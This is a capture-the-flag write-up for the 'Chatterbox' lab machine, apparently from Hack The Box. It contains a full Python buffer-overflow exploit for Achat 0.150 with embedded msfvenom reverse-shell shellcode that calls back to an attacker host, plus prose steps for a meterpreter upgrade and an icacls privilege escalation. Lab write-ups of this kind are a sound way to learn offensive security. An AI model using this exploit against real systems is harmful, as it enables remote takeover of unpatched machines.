Github Twitter

Chatterbox

Chatterbox - 10.10.10.74

Target Enumeration:

OS: Windows

IP: 10.10.10.74

User: 72290246dfaedb1e3e3ac9d6fb306334

Root: a673d1b1fa95c276c5ef2aa13d9dcc7c

Ports / Services / Software Versions Running

9255/tcp open mon

9256/tcp open -

Vulnerability Exploited:

Achat Remote Buffer Overflow.

https://www.exploit-db.com/exploits/36025/

Privilege Escalation:

Icacls on root.txt allows current user to read any file owned by the administrator.

Exploiting the host:

Nmap took too long so I used Sparta on this one:

Revealed port 9255 & 9256 open.

Googling the port gave us Achat

That is a really buggy metasploit exploit so we found a better one online:

https://www.exploit-db.com/exploits/36025/

Generate your shellcode

Paste that into the script so it looks as follows:

#!/usr/bin/python
# Author KAhara MAnhara - modified
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit

import socket
import sys, time

# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes

buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x47\x78\x53\x52"
buf += "\x4d\x30\x4d\x30\x59\x70\x43\x30\x45\x39\x6b\x35\x6e"
buf += "\x51\x55\x70\x71\x54\x72\x6b\x72\x30\x6c\x70\x54\x4b"
buf += "\x4f\x62\x7a\x6c\x72\x6b\x42\x32\x6e\x34\x44\x4b\x30"
buf += "\x72\x6b\x78\x6a\x6f\x37\x47\x6d\x7a\x4f\x36\x30\x31"
buf += "\x69\x6f\x66\x4c\x6f\x4c\x51\x51\x51\x6c\x59\x72\x4e"
buf += "\x4c\x6b\x70\x79\x31\x46\x6f\x4c\x4d\x49\x71\x57\x57"
buf += "\x79\x52\x39\x62\x4e\x72\x32\x37\x52\x6b\x30\x52\x4a"
buf += "\x70\x32\x6b\x4e\x6a\x4f\x4c\x72\x6b\x4e\x6c\x4b\x61"
buf += "\x71\x68\x69\x53\x6e\x68\x79\x71\x68\x51\x32\x31\x62"
buf += "\x6b\x50\x59\x6b\x70\x59\x71\x46\x73\x74\x4b\x61\x39"
buf += "\x7a\x78\x5a\x43\x6e\x5a\x6d\x79\x34\x4b\x30\x34\x74"
buf += "\x4b\x49\x71\x57\x66\x30\x31\x49\x6f\x74\x6c\x56\x61"
buf += "\x46\x6f\x6c\x4d\x59\x71\x69\x37\x4e\x58\x67\x70\x70"
buf += "\x75\x69\x66\x49\x73\x53\x4d\x39\x68\x4f\x4b\x71\x6d"
buf += "\x6b\x74\x73\x45\x37\x74\x51\x48\x54\x4b\x6f\x68\x6f"
buf += "\x34\x79\x71\x5a\x33\x32\x46\x44\x4b\x6a\x6c\x30\x4b"
buf += "\x52\x6b\x71\x48\x6d\x4c\x39\x71\x56\x73\x72\x6b\x6c"
buf += "\x44\x32\x6b\x6d\x31\x48\x50\x31\x79\x4d\x74\x6f\x34"
buf += "\x6e\x44\x4f\x6b\x31\x4b\x70\x61\x31\x49\x71\x4a\x52"
buf += "\x31\x6b\x4f\x47\x70\x51\x4f\x71\x4f\x70\x5a\x34\x4b"
buf += "\x4c\x52\x58\x6b\x72\x6d\x4f\x6d\x4f\x78\x30\x33\x50"
buf += "\x32\x79\x70\x69\x70\x53\x38\x52\x57\x73\x43\x50\x32"
buf += "\x31\x4f\x61\x44\x32\x48\x50\x4c\x30\x77\x4f\x36\x7a"
buf += "\x67\x6b\x4f\x36\x75\x36\x58\x62\x70\x49\x71\x59\x70"
buf += "\x49\x70\x6f\x39\x35\x74\x6f\x64\x32\x30\x43\x38\x4b"
buf += "\x79\x63\x50\x30\x6b\x4b\x50\x79\x6f\x48\x55\x42\x30"
buf += "\x70\x50\x42\x30\x42\x30\x51\x30\x62\x30\x61\x30\x6e"
buf += "\x70\x63\x38\x39\x5a\x7a\x6f\x79\x4f\x49\x50\x69\x6f"
buf += "\x78\x55\x45\x47\x32\x4a\x69\x75\x31\x58\x49\x7a\x4a"
buf += "\x6a\x6a\x6e\x6b\x58\x33\x38\x39\x72\x49\x70\x4a\x61"
buf += "\x65\x6b\x72\x69\x49\x56\x70\x6a\x4a\x70\x6f\x66\x51"
buf += "\x47\x70\x68\x44\x59\x46\x45\x53\x44\x43\x31\x59\x6f"
buf += "\x5a\x35\x35\x35\x59\x30\x62\x54\x6a\x6c\x49\x6f\x4e"
buf += "\x6e\x4c\x48\x44\x35\x78\x6c\x43\x38\x78\x70\x74\x75"
buf += "\x65\x52\x42\x36\x79\x6f\x79\x45\x62\x48\x30\x63\x52"
buf += "\x4d\x52\x44\x79\x70\x32\x69\x68\x63\x6f\x67\x4f\x67"
buf += "\x71\x47\x4c\x71\x7a\x56\x42\x4a\x6a\x72\x50\x59\x6e"
buf += "\x76\x49\x52\x4b\x4d\x42\x46\x35\x77\x31\x34\x6c\x64"
buf += "\x4d\x6c\x5a\x61\x6d\x31\x44\x4d\x31\x34\x4e\x44\x4a"
buf += "\x70\x76\x66\x6b\x50\x4e\x64\x51\x44\x30\x50\x6e\x76"
buf += "\x31\x46\x30\x56\x31\x36\x50\x56\x70\x4e\x50\x56\x72"
buf += "\x36\x71\x43\x51\x46\x42\x48\x43\x49\x68\x4c\x4f\x4f"
buf += "\x62\x66\x6b\x4f\x76\x75\x74\x49\x59\x50\x6e\x6e\x62"
buf += "\x36\x51\x36\x59\x6f\x30\x30\x33\x38\x79\x78\x53\x57"
buf += "\x4b\x6d\x51\x50\x4b\x4f\x78\x55\x45\x6b\x4c\x30\x76"
buf += "\x55\x35\x52\x70\x56\x62\x48\x63\x76\x34\x55\x77\x4d"
buf += "\x33\x6d\x49\x6f\x4a\x35\x4d\x6c\x4b\x56\x73\x4c\x7a"
buf += "\x6a\x53\x50\x39\x6b\x79\x50\x71\x65\x7a\x65\x67\x4b"
buf += "\x70\x47\x6d\x43\x62\x52\x32\x4f\x4f\x7a\x69\x70\x42"
buf += "\x33\x4b\x4f\x37\x65\x41\x41"

# Create a UDP socket - Change this host!!!
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()

Execute

Now you have a shell

Upgrade your shell to meterpreter as it is windows 7 we will use powershell to download it.

Generate a shell with msfvenom

Start your python web server and a metasploit listener

Download the file with the following commands and execute it.

Now you have a meterpreter shell

Enumerating the system show you that you can access the administrators desktop but cannot read the file.

Use the following command to assign ownership to alfred and collect the root flag.

PreviousRabbitNextNibbles

Last updated